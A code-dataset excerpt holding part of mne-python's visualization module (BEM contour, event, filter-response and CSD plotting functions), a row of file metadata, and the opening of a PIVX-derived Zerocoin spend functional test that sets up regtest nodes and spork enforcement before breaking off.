(x, y, z), (flip_x, flip_y, flip_z), order = _mri_orientation(
nim, orientation)
transpose = x < y
data = _get_img_fdata(nim)
shift_x = data.shape[x] if flip_x < 0 else 0
shift_y = data.shape[y] if flip_y < 0 else 0
n_slices = data.shape[z]
if slices is None:
slices = np.round(np.linspace(0, n_slices - 1, 14)).astype(int)[1:-1]
slices = np.atleast_1d(slices).copy()
slices[slices < 0] += n_slices # allow negative indexing
if not np.array_equal(np.sort(slices), slices) or slices.ndim != 1 or \
slices.size < 1 or slices[0] < 0 or slices[-1] >= n_slices or \
slices.dtype.kind not in 'iu':
raise ValueError('slices must be a sorted 1D array of int with unique '
'elements, at least one element, and no elements '
'greater than %d, got %s' % (n_slices - 1, slices))
if flip_z < 0:
# Proceed in the opposite order to maintain left-to-right / orientation
slices = slices[::-1]
# create of list of surfaces
surfs = list()
for file_name, color in surfaces:
surf = dict()
surf['rr'], surf['tris'] = read_surface(file_name)
# move surface to voxel coordinate system
surf['rr'] = apply_trans(mri_vox_t, surf['rr'])
surfs.append((surf, color))
sources = list()
if src is not None:
_ensure_src(src, extra=' or None')
# Eventually we can relax this by allowing ``trans`` if need be
if src[0]['coord_frame'] != FIFF.FIFFV_COORD_MRI:
raise ValueError(
'Source space must be in MRI coordinates, got '
f'{_frame_to_str[src[0]["coord_frame"]]}')
for src_ in src:
points = src_['rr'][src_['inuse'].astype(bool)]
sources.append(apply_trans(mri_vox_t, points * 1e3))
sources = np.concatenate(sources, axis=0)
if img_output:
n_col = n_axes = 1
fig, ax = plt.subplots(1, 1, figsize=(7.0, 7.0))
axs = [ax] * len(slices)
w = fig.get_size_inches()[0]
fig.set_size_inches([w, w / data.shape[x] * data.shape[y]])
plt.close(fig)
else:
n_col = 4
fig, axs, _, _ = _prepare_trellis(len(slices), n_col)
n_axes = len(axs)
fig.set_facecolor('k')
bounds = np.concatenate(
[[-np.inf], slices[:-1] + np.diff(slices) / 2., [np.inf]]) # float
slicer = [slice(None)] * 3
ori_labels = dict(R='LR', A='PA', S='IS')
xlabels, ylabels = ori_labels[order[0]], ori_labels[order[1]]
path_effects = [patheffects.withStroke(linewidth=4, foreground="k",
alpha=0.75)]
out = list() if img_output else fig
for ai, (ax, sl, lower, upper) in enumerate(zip(
axs, slices, bounds[:-1], bounds[1:])):
# adjust the orientations for good view
slicer[z] = sl
dat = data[tuple(slicer)]
dat = dat.T if transpose else dat
dat = dat[::flip_y, ::flip_x]
# First plot the anatomical data
if img_output:
ax.clear()
ax.imshow(dat, cmap=plt.cm.gray, origin='lower')
ax.set_autoscale_on(False)
ax.axis('off')
ax.set_aspect('equal') # XXX eventually could deal with zooms
# and then plot the contours on top
for surf, color in surfs:
with warnings.catch_warnings(record=True): # ignore contour warn
warnings.simplefilter('ignore')
ax.tricontour(flip_x * surf['rr'][:, x] + shift_x,
flip_y * surf['rr'][:, y] + shift_y,
surf['tris'], surf['rr'][:, z],
levels=[sl], colors=color, linewidths=1.0,
zorder=1)
if len(sources):
in_slice = (sources[:, z] >= lower) & (sources[:, z] < upper)
ax.scatter(flip_x * sources[in_slice, x] + shift_x,
flip_y * sources[in_slice, y] + shift_y,
marker='.', color='#FF00FF', s=1, zorder=2)
if show_indices:
ax.text(dat.shape[1] // 8 + 0.5, 0.5, str(sl),
color='w', fontsize='x-small', va='bottom', ha='left')
# label the axes
kwargs = dict(
color='#66CCEE', fontsize='medium', path_effects=path_effects,
family='monospace', clip_on=False, zorder=5, weight='bold')
if show_orientation:
if ai % n_col == 0: # left
ax.text(0, dat.shape[0] / 2., xlabels[0],
va='center', ha='left', **kwargs)
if ai % n_col == n_col - 1 or ai == n_axes - 1: # right
ax.text(dat.shape[1] - 1, dat.shape[0] / 2., xlabels[1],
va='center', ha='right', **kwargs)
if ai >= n_axes - n_col: # bottom
ax.text(dat.shape[1] / 2., 0, ylabels[0],
ha='center', va='bottom', **kwargs)
if ai < n_col or n_col == 1: # top
ax.text(dat.shape[1] / 2., dat.shape[0] - 1, ylabels[1],
ha='center', va='top', **kwargs)
if img_output:
output = BytesIO()
fig.savefig(output, bbox_inches='tight',
pad_inches=0, format='png')
out.append(base64.b64encode(output.getvalue()).decode('ascii'))
fig.subplots_adjust(left=0., bottom=0., right=1., top=1., wspace=0.,
hspace=0.)
plt_show(show, fig=fig)
return out
def plot_bem(subject=None, subjects_dir=None, orientation='coronal',
slices=None, brain_surfaces=None, src=None, show=True,
show_indices=True, mri='T1.mgz', show_orientation=True):
"""Plot BEM contours on anatomical slices.
Parameters
----------
subject : str
Subject name.
subjects_dir : str | None
Path to the SUBJECTS_DIR. If None, the path is obtained by using
the environment variable SUBJECTS_DIR.
orientation : str
'coronal' or 'axial' or 'sagittal'.
slices : list of int
Slice indices.
brain_surfaces : None | str | list of str
One or more brain surface to plot (optional). Entries should correspond
to files in the subject's ``surf`` directory (e.g. ``"white"``).
src : None | SourceSpaces | str
SourceSpaces instance or path to a source space to plot individual
sources as scatter-plot. Sources will be shown on exactly one slice
(whichever slice is closest to each source in the given orientation
plane). Path can be absolute or relative to the subject's ``bem``
folder.
.. versionchanged:: 0.20
All sources are shown on the nearest slice rather than some
being omitted.
show : bool
Show figure if True.
show_indices : bool
Show slice indices if True.
.. versionadded:: 0.20
mri : str
The name of the MRI to use. Can be a standard FreeSurfer MRI such as
``'T1.mgz'``, or a full path to a custom MRI file.
.. versionadded:: 0.21
show_orientation : str
Show the orientation (L/R, P/A, I/S) of the data slices.
.. versionadded:: 0.21
Returns
-------
fig : instance of matplotlib.figure.Figure
The figure.
See Also
--------
mne.viz.plot_alignment
Notes
-----
Images are plotted in MRI voxel coordinates.
If ``src`` is not None, for a given slice index, all source points are
shown that are halfway between the previous slice and the given slice,
and halfway between the given slice and the next slice.
For large slice decimations, this can
make some source points appear outside the BEM contour, which is shown
for the given slice index. For example, in the case where the single
midpoint slice is used ``slices=[128]``, all source points will be shown
on top of the midpoint MRI slice with the BEM boundary drawn for that
slice.
"""
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
mri_fname = _check_mri(mri, subject, subjects_dir)
# Get the BEM surface filenames
bem_path = op.join(subjects_dir, subject, 'bem')
if not op.isdir(bem_path):
raise IOError('Subject bem directory "%s" does not exist' % bem_path)
surfaces = _get_bem_plotting_surfaces(bem_path)
if brain_surfaces is not None:
if isinstance(brain_surfaces, str):
brain_surfaces = (brain_surfaces,)
for surf_name in brain_surfaces:
for hemi in ('lh', 'rh'):
surf_fname = op.join(subjects_dir, subject, 'surf',
hemi + '.' + surf_name)
if op.exists(surf_fname):
surfaces.append((surf_fname, '#00DD00'))
else:
raise IOError("Surface %s does not exist." % surf_fname)
if isinstance(src, str):
if not op.exists(src):
src_ = op.join(subjects_dir, subject, 'bem', src)
if op.exists(src_):
src = src_
else:
raise IOError("%s does not exist" % src)
src = read_source_spaces(src)
elif src is not None and not isinstance(src, SourceSpaces):
raise TypeError("src needs to be None, str or SourceSpaces instance, "
"not %s" % repr(src))
if len(surfaces) == 0:
raise IOError('No surface files found. Surface files must end with '
'inner_skull.surf, outer_skull.surf or outer_skin.surf')
# Plot the contours
return _plot_mri_contours(mri_fname, surfaces, src, orientation, slices,
show, show_indices, show_orientation)
def _get_bem_plotting_surfaces(bem_path):
surfaces = []
for surf_name, color in (('*inner_skull', '#FF0000'),
('*outer_skull', '#FFFF00'),
('*outer_skin', '#FFAA80')):
surf_fname = glob(op.join(bem_path, surf_name + '.surf'))
if len(surf_fname) > 0:
surf_fname = surf_fname[0]
logger.info("Using surface: %s" % surf_fname)
surfaces.append((surf_fname, color))
return surfaces
@verbose
def plot_events(events, sfreq=None, first_samp=0, color=None, event_id=None,
axes=None, equal_spacing=True, show=True, on_missing='raise',
verbose=None):
"""Plot events to get a visual display of the paradigm.
Parameters
----------
events : array, shape (n_events, 3)
The events.
sfreq : float | None
The sample frequency. If None, data will be displayed in samples (not
seconds).
first_samp : int
The index of the first sample. Recordings made on Neuromag systems
number samples relative to the system start (not relative to the
beginning of the recording). In such cases the ``raw.first_samp``
attribute can be passed here. Default is 0.
color : dict | None
Dictionary of event_id integers as keys and colors as values. If None,
colors are automatically drawn from a default list (cycled through if
number of events longer than list of default colors). Color can be any
valid :doc:`matplotlib color <tutorials/colors/colors>`.
event_id : dict | None
Dictionary of event labels (e.g. 'aud_l') as keys and their associated
event_id values. Labels are used to plot a legend. If None, no legend
is drawn.
axes : instance of Axes
The subplot handle.
equal_spacing : bool
Use equal spacing between events in y-axis.
show : bool
Show figure if True.
%(on_missing_events)s
%(verbose)s
Returns
-------
fig : matplotlib.figure.Figure
The figure object containing the plot.
Notes
-----
.. versionadded:: 0.9.0
"""
if sfreq is None:
sfreq = 1.0
xlabel = 'Samples'
else:
xlabel = 'Time (s)'
events = np.asarray(events)
if len(events) == 0:
raise ValueError('No events in events array, cannot plot.')
unique_events = np.unique(events[:, 2])
if event_id is not None:
# get labels and unique event ids from event_id dict,
# sorted by value
event_id_rev = {v: k for k, v in event_id.items()}
conditions, unique_events_id = zip(*sorted(event_id.items(),
key=lambda x: x[1]))
keep = np.ones(len(unique_events_id), bool)
for ii, this_event in enumerate(unique_events_id):
if this_event not in unique_events:
msg = f'{this_event} from event_id is not present in events.'
_on_missing(on_missing, msg)
keep[ii] = False
conditions = [cond for cond, k in zip(conditions, keep) if k]
unique_events_id = [id_ for id_, k in zip(unique_events_id, keep) if k]
if len(unique_events_id) == 0:
raise RuntimeError('No usable event IDs found')
for this_event in unique_events:
if this_event not in unique_events_id:
warn('event %s missing from event_id will be ignored'
% this_event)
else:
unique_events_id = unique_events
color = _handle_event_colors(color, unique_events, event_id)
import matplotlib.pyplot as plt
fig = None
if axes is None:
fig = plt.figure()
ax = axes if axes else plt.gca()
unique_events_id = np.array(unique_events_id)
min_event = np.min(unique_events_id)
max_event = np.max(unique_events_id)
max_x = (events[np.in1d(events[:, 2], unique_events_id), 0].max() -
first_samp) / sfreq
handles, labels = list(), list()
for idx, ev in enumerate(unique_events_id):
ev_mask = events[:, 2] == ev
count = ev_mask.sum()
if count == 0:
continue
y = np.full(count, idx + 1 if equal_spacing else events[ev_mask, 2][0])
if event_id is not None:
event_label = '%s (%s)' % (event_id_rev[ev], count)
else:
event_label = 'N=%d' % (count,)
labels.append(event_label)
kwargs = {}
if ev in color:
kwargs['color'] = color[ev]
handles.append(
ax.plot((events[ev_mask, 0] - first_samp) / sfreq,
y, '.', clip_on=False, **kwargs)[0])
if equal_spacing:
ax.set_ylim(0, unique_events_id.size + 1)
ax.set_yticks(1 + np.arange(unique_events_id.size))
ax.set_yticklabels(unique_events_id)
else:
ax.set_ylim([min_event - 1, max_event + 1])
ax.set(xlabel=xlabel, ylabel='Events id', xlim=[0, max_x])
ax.grid(True)
fig = fig if fig is not None else plt.gcf()
# reverse order so that the highest numbers are at the top
# (match plot order)
handles, labels = handles[::-1], labels[::-1]
box = ax.get_position()
factor = 0.8 if event_id is not None else 0.9
ax.set_position([box.x0, box.y0, box.width * factor, box.height])
ax.legend(handles, labels, loc='center left', bbox_to_anchor=(1, 0.5),
fontsize='small')
fig.canvas.draw()
plt_show(show)
return fig
def _get_presser(fig):
"""Get our press callback."""
import matplotlib
callbacks = fig.canvas.callbacks.callbacks['button_press_event']
func = None
for key, val in callbacks.items():
if LooseVersion(matplotlib.__version__) >= '3':
func = val()
else:
func = val.func
if func.__class__.__name__ == 'partial':
break
else:
func = None
assert func is not None
return func
def plot_dipole_amplitudes(dipoles, colors=None, show=True):
"""Plot the amplitude traces of a set of dipoles.
Parameters
----------
dipoles : list of instance of Dipole
The dipoles whose amplitudes should be shown.
colors : list of color | None
Color to plot with each dipole. If None default colors are used.
show : bool
Show figure if True.
Returns
-------
fig : matplotlib.figure.Figure
The figure object containing the plot.
Notes
-----
.. versionadded:: 0.9.0
"""
import matplotlib.pyplot as plt
if colors is None:
colors = cycle(_get_color_list())
fig, ax = plt.subplots(1, 1)
xlim = [np.inf, -np.inf]
for dip, color in zip(dipoles, colors):
ax.plot(dip.times, dip.amplitude * 1e9, color=color, linewidth=1.5)
xlim[0] = min(xlim[0], dip.times[0])
xlim[1] = max(xlim[1], dip.times[-1])
ax.set(xlim=xlim, xlabel='Time (s)', ylabel='Amplitude (nAm)')
if show:
fig.show(warn=False)
return fig
def adjust_axes(axes, remove_spines=('top', 'right'), grid=True):
"""Adjust some properties of axes.
Parameters
----------
axes : list
List of axes to process.
remove_spines : list of str
Which axis spines to remove.
grid : bool
Turn grid on (True) or off (False).
"""
axes = [axes] if not isinstance(axes, (list, tuple, np.ndarray)) else axes
for ax in axes:
if grid:
ax.grid(zorder=0)
for key in remove_spines:
ax.spines[key].set_visible(False)
def _filter_ticks(lims, fscale):
"""Create approximately spaced ticks between lims."""
if fscale == 'linear':
return None, None # let matplotlib handle it
lims = np.array(lims)
ticks = list()
if lims[1] > 20 * lims[0]:
base = np.array([1, 2, 4])
else:
base = np.arange(1, 11)
for exp in range(int(np.floor(np.log10(lims[0]))),
int(np.floor(np.log10(lims[1]))) + 1):
ticks += (base * (10 ** exp)).tolist()
ticks = np.array(ticks)
ticks = ticks[(ticks >= lims[0]) & (ticks <= lims[1])]
ticklabels = [('%g' if t < 1 else '%d') % t for t in ticks]
return ticks, ticklabels
def _get_flim(flim, fscale, freq, sfreq=None):
"""Get reasonable frequency limits."""
if flim is None:
if freq is None:
flim = [0.1 if fscale == 'log' else 0., sfreq / 2.]
else:
if fscale == 'linear':
flim = [freq[0]]
else:
flim = [freq[0] if freq[0] > 0 else 0.1 * freq[1]]
flim += [freq[-1]]
if fscale == 'log':
if flim[0] <= 0:
raise ValueError('flim[0] must be positive, got %s' % flim[0])
elif flim[0] < 0:
raise ValueError('flim[0] must be non-negative, got %s' % flim[0])
return flim
def _check_fscale(fscale):
"""Check for valid fscale."""
if not isinstance(fscale, str) or fscale not in ('log', 'linear'):
raise ValueError('fscale must be "log" or "linear", got %s'
% (fscale,))
_DEFAULT_ALIM = (-80, 10)
def plot_filter(h, sfreq, freq=None, gain=None, title=None, color='#1f77b4',
flim=None, fscale='log', alim=_DEFAULT_ALIM, show=True,
compensate=False, plot=('time', 'magnitude', 'delay'),
axes=None):
"""Plot properties of a filter.
Parameters
----------
h : dict or ndarray
An IIR dict or 1D ndarray of coefficients (for FIR filter).
sfreq : float
Sample rate of the data (Hz).
freq : array-like or None
The ideal response frequencies to plot (must be in ascending order).
If None (default), do not plot the ideal response.
gain : array-like or None
The ideal response gains to plot.
If None (default), do not plot the ideal response.
title : str | None
The title to use. If None (default), determine the title based
on the type of the system.
color : color object
The color to use (default '#1f77b4').
flim : tuple or None
If not None, the x-axis frequency limits (Hz) to use.
If None, freq will be used. If None (default) and freq is None,
``(0.1, sfreq / 2.)`` will be used.
fscale : str
Frequency scaling to use, can be "log" (default) or "linear".
alim : tuple
The y-axis amplitude limits (dB) to use (default: (-60, 10)).
show : bool
Show figure if True (default).
compensate : bool
If True, compensate for the filter delay (phase will not be shown).
- For linear-phase FIR filters, this visualizes the filter coefficients
assuming that the output will be shifted by ``N // 2``.
- For IIR filters, this changes the filter coefficient display
by filtering backward and forward, and the frequency response
by squaring it.
.. versionadded:: 0.18
plot : list | tuple | str
A list of the requested plots from ``time``, ``magnitude`` and
``delay``. Default is to plot all three filter properties
('time', 'magnitude', 'delay').
.. versionadded:: 0.21.0
axes : instance of Axes | list | None
The axes to plot to. If list, the list must be a list of Axes of
the same length as the number of requested plot types. If instance of
Axes, there must be only one filter property plotted.
Defaults to ``None``.
.. versionadded:: 0.21.0
Returns
-------
fig : matplotlib.figure.Figure
The figure containing the plots.
See Also
--------
mne.filter.create_filter
plot_ideal_filter
Notes
-----
.. versionadded:: 0.14
"""
from scipy.signal import (
freqz, group_delay, lfilter, filtfilt, sosfilt, sosfiltfilt)
import matplotlib.pyplot as plt
sfreq = float(sfreq)
_check_option('fscale', fscale, ['log', 'linear'])
if isinstance(plot, str):
plot = [plot]
for xi, x in enumerate(plot):
_check_option('plot[%d]' % xi, x, ('magnitude', 'delay', 'time'))
flim = _get_flim(flim, fscale, freq, sfreq)
if fscale == 'log':
omega = np.logspace(np.log10(flim[0]), np.log10(flim[1]), 1000)
else:
omega = np.linspace(flim[0], flim[1], 1000)
xticks, xticklabels = _filter_ticks(flim, fscale)
omega /= sfreq / (2 * np.pi)
if isinstance(h, dict): # IIR h.ndim == 2: # second-order sections
if 'sos' in h:
H = np.ones(len(omega), np.complex128)
gd = np.zeros(len(omega))
for section in h['sos']:
this_H = freqz(section[:3], section[3:], omega)[1]
H *= this_H
if compensate:
H *= this_H.conj() # time reversal is freq conj
else:
# Assume the forward-backward delay zeros out, which it
# mostly should
with warnings.catch_warnings(record=True): # singular GD
warnings.simplefilter('ignore')
gd += group_delay((section[:3], section[3:]), omega)[1]
n = estimate_ringing_samples(h['sos'])
delta = np.zeros(n)
delta[0] = 1
if compensate:
delta = np.pad(delta, [(n - 1, 0)], 'constant')
func = sosfiltfilt
gd += (len(delta) - 1) // 2
else:
func = sosfilt
h = func(h['sos'], delta)
else:
H = freqz(h['b'], h['a'], omega)[1]
if compensate:
H *= H.conj()
with warnings.catch_warnings(record=True): # singular GD
warnings.simplefilter('ignore')
gd = group_delay((h['b'], h['a']), omega)[1]
if compensate:
gd += group_delay(h['b'].conj(), h['a'].conj(), omega)[1]
n = estimate_ringing_samples((h['b'], h['a']))
delta = np.zeros(n)
delta[0] = 1
if compensate:
delta = np.pad(delta, [(n - 1, 0)], 'constant')
func = filtfilt
else:
func = lfilter
h = func(h['b'], h['a'], delta)
if title is None:
title = 'SOS (IIR) filter'
if compensate:
title += ' (forward-backward)'
else:
H = freqz(h, worN=omega)[1]
with warnings.catch_warnings(record=True): # singular GD
warnings.simplefilter('ignore')
gd = group_delay((h, [1.]), omega)[1]
title = 'FIR filter' if title is None else title
if compensate:
title += ' (delay-compensated)'
fig = None
if axes is None:
fig, axes = plt.subplots(len(plot), 1)
if isinstance(axes, plt.Axes):
axes = [axes]
elif isinstance(axes, np.ndarray):
axes = list(axes)
if fig is None:
fig = axes[0].get_figure()
if len(axes) != len(plot):
raise ValueError('Length of axes (%d) must be the same as number of '
'requested filter properties (%d)'
% (len(axes), len(plot)))
t = np.arange(len(h))
dlim = np.abs(t).max() / 2.
dlim = [-dlim, dlim]
if compensate:
n_shift = (len(h) - 1) // 2
t -= n_shift
assert t[0] == -t[-1]
gd -= n_shift
t = t / sfreq
gd = gd / sfreq
f = omega * sfreq / (2 * np.pi)
sl = slice(0 if fscale == 'linear' else 1, None, None)
mag = 10 * np.log10(np.maximum((H * H.conj()).real, 1e-20))
if 'time' in plot:
ax_time_idx = np.where([p == 'time' for p in plot])[0][0]
axes[ax_time_idx].plot(t, h, color=color)
axes[ax_time_idx].set(xlim=t[[0, -1]], xlabel='Time (s)',
ylabel='Amplitude', title=title)
# Magnitude
if 'magnitude' in plot:
ax_mag_idx = np.where([p == 'magnitude' for p in plot])[0][0]
axes[ax_mag_idx].plot(f[sl], mag[sl], color=color,
linewidth=2, zorder=4)
if freq is not None and gain is not None:
plot_ideal_filter(freq, gain, axes[ax_mag_idx],
fscale=fscale, show=False)
axes[ax_mag_idx].set(ylabel='Magnitude (dB)', xlabel='', xscale=fscale)
if xticks is not None:
axes[ax_mag_idx].set(xticks=xticks)
axes[ax_mag_idx].set(xticklabels=xticklabels)
axes[ax_mag_idx].set(xlim=flim, ylim=alim, xlabel='Frequency (Hz)',
ylabel='Amplitude (dB)')
# Delay
if 'delay' in plot:
ax_delay_idx = np.where([p == 'delay' for p in plot])[0][0]
axes[ax_delay_idx].plot(f[sl], gd[sl], color=color,
linewidth=2, zorder=4)
# shade nulled regions
for start, stop in zip(*_mask_to_onsets_offsets(mag <= -39.9)):
axes[ax_delay_idx].axvspan(f[start], f[stop - 1],
facecolor='k', alpha=0.05,
zorder=5)
axes[ax_delay_idx].set(xlim=flim, ylabel='Group delay (s)',
xlabel='Frequency (Hz)',
xscale=fscale)
if xticks is not None:
axes[ax_delay_idx].set(xticks=xticks)
axes[ax_delay_idx].set(xticklabels=xticklabels)
axes[ax_delay_idx].set(xlim=flim, ylim=dlim, xlabel='Frequency (Hz)',
ylabel='Delay (s)')
adjust_axes(axes)
tight_layout()
plt_show(show)
return fig
def plot_ideal_filter(freq, gain, axes=None, title='', flim=None, fscale='log',
alim=_DEFAULT_ALIM, color='r', alpha=0.5, linestyle='--',
show=True):
"""Plot an ideal filter response.
Parameters
----------
freq : array-like
The ideal response frequencies to plot (must be in ascending order).
gain : array-like or None
The ideal response gains to plot.
axes : instance of Axes | None
The subplot handle. With None (default), axes are created.
title : str
The title to use, (default: '').
flim : tuple or None
If not None, the x-axis frequency limits (Hz) to use.
If None (default), freq used.
fscale : str
Frequency scaling to use, can be "log" (default) or "linear".
alim : tuple
If not None (default), the y-axis limits (dB) to use.
color : color object
The color to use (default: 'r').
alpha : float
The alpha to use (default: 0.5).
linestyle : str
The line style to use (default: '--').
show : bool
Show figure if True (default).
Returns
-------
fig : instance of matplotlib.figure.Figure
The figure.
See Also
--------
plot_filter
Notes
-----
.. versionadded:: 0.14
Examples
--------
Plot a simple ideal band-pass filter::
>>> from mne.viz import plot_ideal_filter
>>> freq = [0, 1, 40, 50]
>>> gain = [0, 1, 1, 0]
>>> plot_ideal_filter(freq, gain, flim=(0.1, 100)) #doctest: +ELLIPSIS
<...Figure...>
"""
import matplotlib.pyplot as plt
my_freq, my_gain = list(), list()
if freq[0] != 0:
raise ValueError('freq should start with DC (zero) and end with '
'Nyquist, but got %s for DC' % (freq[0],))
freq = np.array(freq)
# deal with semilogx problems @ x=0
_check_option('fscale', fscale, ['log', 'linear'])
if fscale == 'log':
freq[0] = 0.1 * freq[1] if flim is None else min(flim[0], freq[1])
flim = _get_flim(flim, fscale, freq)
transitions = list()
for ii in range(len(freq)):
if ii < len(freq) - 1 and gain[ii] != gain[ii + 1]:
transitions += [[freq[ii], freq[ii + 1]]]
my_freq += np.linspace(freq[ii], freq[ii + 1], 20,
endpoint=False).tolist()
my_gain += np.linspace(gain[ii], gain[ii + 1], 20,
endpoint=False).tolist()
else:
my_freq.append(freq[ii])
my_gain.append(gain[ii])
my_gain = 10 * np.log10(np.maximum(my_gain, 10 ** (alim[0] / 10.)))
if axes is None:
axes = plt.subplots(1)[1]
for transition in transitions:
axes.axvspan(*transition, color=color, alpha=0.1)
axes.plot(my_freq, my_gain, color=color, linestyle=linestyle, alpha=0.5,
linewidth=4, zorder=3)
xticks, xticklabels = _filter_ticks(flim, fscale)
axes.set(ylim=alim, xlabel='Frequency (Hz)', ylabel='Amplitude (dB)',
xscale=fscale)
if xticks is not None:
axes.set(xticks=xticks)
axes.set(xticklabels=xticklabels)
axes.set(xlim=flim)
if title:
axes.set(title=title)
adjust_axes(axes)
tight_layout()
plt_show(show)
return axes.figure
def _handle_event_colors(color_dict, unique_events, event_id):
"""Create event-integer-to-color mapping, assigning defaults as needed."""
default_colors = dict(zip(sorted(unique_events), cycle(_get_color_list())))
# warn if not enough colors
if color_dict is None:
if len(unique_events) > len(_get_color_list()):
warn('More events than default colors available. You should pass '
'a list of unique colors.')
else:
custom_colors = dict()
for key, color in color_dict.items():
if key in unique_events: # key was a valid event integer
custom_colors[key] = color
elif key in event_id: # key was an event label
custom_colors[event_id[key]] = color
else: # key not a valid event, warn and ignore
warn('Event ID %s is in the color dict but is not '
'present in events or event_id.' % str(key))
# warn if color_dict is missing any entries
unassigned = sorted(set(unique_events) - set(custom_colors))
if len(unassigned):
unassigned_str = ', '.join(str(e) for e in unassigned)
warn('Color was not assigned for event%s %s. Default colors will '
'be used.' % (_pl(unassigned), unassigned_str))
default_colors.update(custom_colors)
return default_colors
def plot_csd(csd, info=None, mode='csd', colorbar=True, cmap=None,
n_cols=None, show=True):
"""Plot CSD matrices.
A sub-plot is created for each frequency. If an info object is passed to
the function, different channel types are plotted in different figures.
Parameters
----------
csd : instance of CrossSpectralDensity
The CSD matrix to plot.
info : instance of Info | None
To split the figure by channel-type, provide the measurement info.
By default, the CSD matrix is plotted as a whole.
mode : 'csd' | 'coh'
Whether to plot the cross-spectral density ('csd', the default), or
the coherence ('coh') between the channels.
colorbar : bool
Whether to show a colorbar. Defaults to ``True``.
cmap : str | None
The matplotlib colormap to use. Defaults to None, which means the
colormap will default to matplotlib's default.
n_cols : int | None
CSD matrices are plotted in a grid. This parameter controls how
many matrix to plot side by side before starting a new row. By
default, a number will be chosen to make the grid as square as
possible.
show : bool
Whether to show the figure. Defaults to ``True``.
Returns
-------
fig : list of Figure
The figures created by this function.
"""
import matplotlib.pyplot as plt
if mode not in ['csd', 'coh']:
raise ValueError('"mode" should be either "csd" or "coh".')
if info is not None:
info_ch_names = info['ch_names']
sel_eeg = pick_types(info, meg=False, eeg=True, ref_meg=False,
exclude=[])
sel_mag = pick_types(info, meg='mag', eeg=False, ref_meg=False,
exclude=[])
sel_grad = pick_types(info, meg='grad', eeg=False, ref_meg=False,
exclude=[])
idx_eeg = [csd.ch_names.index(info_ch_names[c])
for c in sel_eeg if info_ch_names[c] in csd.ch_names]
idx_mag = [csd.ch_names.index(info_ch_names[c])
for c in sel_mag if info_ch_names[c] in csd.ch_names]
idx_grad = [csd.ch_names.index(info_ch_names[c])
for c in sel_grad if info_ch_names[c] in csd.ch_names]
indices = [idx_eeg, idx_mag, idx_grad]
titles = ['EEG', 'Magnetometers', 'Gradiometers']
if mode == 'csd':
# The units in which to plot the CSD
units = dict(eeg='µV²', grad='fT²/cm²', mag='fT²')
scalings = dict(eeg=1e12, grad=1e26, mag=1e30)
else:
indices = [np.arange(len(csd.ch_names))]
if mode == 'csd':
titles = ['Cross-spectral density']
# Units and scaling unknown
units = dict()
scalings = dict()
elif mode == 'coh':
titles = ['Coherence']
n_freqs = len(csd.frequencies)
if n_cols is None:
n_cols = int(np.ceil(np.sqrt(n_freqs)))
n_rows = int(np.ceil(n_freqs / float(n_cols)))
figs = []
for ind, title, ch_type in zip(indices, titles, ['eeg', 'mag', 'grad']):
if len(ind) == 0:
continue
fig, axes = plt.subplots(n_rows, n_cols, squeeze=False,
figsize=(2 * n_cols + 1, 2.2 * n_rows))
csd_mats = []
for i in range(len(csd.frequencies)):
cm = csd.get_data(index=i)[ind][:, ind]
if mode == 'csd':
cm = np.abs(cm) * scalings.get(ch_type, 1)
elif mode == 'coh':
# Compute coherence from the CSD matrix
psd = np.diag(cm).real
cm = np.abs(cm) ** 2 / psd[np.newaxis, :] / psd[:, np.newaxis]
csd_mats.append(cm)
vmax = np.max(csd_mats)
for i, (freq, mat) in enumerate(zip(csd.frequencies, csd_mats)):
ax = axes[i // n_cols][i % n_cols]
im = ax.imshow(mat, interpolation='nearest', cmap=cmap, vmin=0,
vmax=vmax)
ax.set_xticks([])
ax.set_yticks([])
if csd._is_sum:
ax.set_title('%.1f-%.1f Hz.' % (np.min(freq),
np.max(freq)))
else:
ax.set_title('%.1f Hz.' % freq)
plt.suptitle(title)
plt.subplots_adjust(top=0.8)
if colorbar:
cb = plt.colorbar(im, ax=[a for ax_ in axes for a in ax_])
if mode == 'csd':
label = u'CSD'
if ch_type in units:
label += u' (%s)' % units[ch_type]
cb.set_label(label)
elif mode == 'coh':
cb.set_label('Coherence')
figs.append(fig)
plt_show(show)
return figs
| 37.417305 | 79 | 0.572595 | [
"BSD-3-Clause"
] | Aniket-Pradhan/mne-python | mne/viz/misc.py | 48,875 | Python |
#!/usr/bin/env python3
# Copyright (c) 2019-2020 The PIVX developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Tests v2, v3 and v4 Zerocoin Spends
'''
from time import sleep
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import PnyTestFramework
from test_framework.util import (
sync_blocks,
assert_equal,
assert_raises_rpc_error,
set_node_times,
DecimalAmt
)
class ZerocoinSpendTest(PnyTestFramework):
def set_test_params(self):
self.num_nodes = 3
# node 0 and node 1 move the chain (node 0 also sets the sporks)
# node 2 does the spends
self.extra_args = [[]]*self.num_nodes
self.extra_args[0].append('-sporkkey=932HEevBSujW2ud7RfB1YF91AFygbBRQj3de3LyaCRqNzKKgWXi')
def setup_chain(self):
# Start with PoS cache: 330 blocks
self._initialize_chain(toPosPhase=True)
self.enable_mocktime()
def log_title(self):
title = "*** Starting %s ***" % self.__class__.__name__
underline = "-" * len(title)
description = "Tests v2, v3 and v4 Zerocoin Spends."
self.log.info("\n\n%s\n%s\n%s\n", title, underline, description)
def setV4SpendEnforcement(self, fEnable=True):
sporkName = "SPORK_18_ZEROCOIN_PUBLICSPEND_V4"
# update spork 18 with node[0]
if fEnable:
self.log.info("Enabling v4 PublicSpend version with SPORK 18...")
res = self.activate_spork(0, sporkName)
else:
self.log.info("Enabling v3 PublicSpend version with SPORK 18...")
res = self.deactivate_spork(0, sporkName)
assert_equal(res, "success")
sleep(1)
# check that node[1] receives it
assert_equal(fEnable, self.is_spork_active(1, sporkName))
self.log.info("done")
def run_test(self):
def get_zerocoin_data(coin):
return coin["s"], coin["r"], coin["k"], coin["id"], coin["d"], coin["t"]
def check_balances(denom, zpny_bal, pny_bal):
zpny_bal -= denom
assert_equal(self.nodes[2].getzerocoinbalance()['Total'], zpny_bal)
pny_bal += denom
wi = self.nodes[2].getwalletinfo()
assert_equal(wi['balance'] + wi['immature_balance'], pny_bal)
return zpny_bal, pny_bal
def stake_4_blocks(block_time):
for peer in range(2):
for i in range(2):
block_time = self.generate_pos(peer, block_time)
sync_blocks(self.nodes)
return block_time
self.log_title()
block_time = self.mocktime
set_node_times(self.nodes, block_time)
# Start with cache balances
wi = self.nodes[2].getwalletinfo()
balance = wi['balance'] + wi['immature_balance']
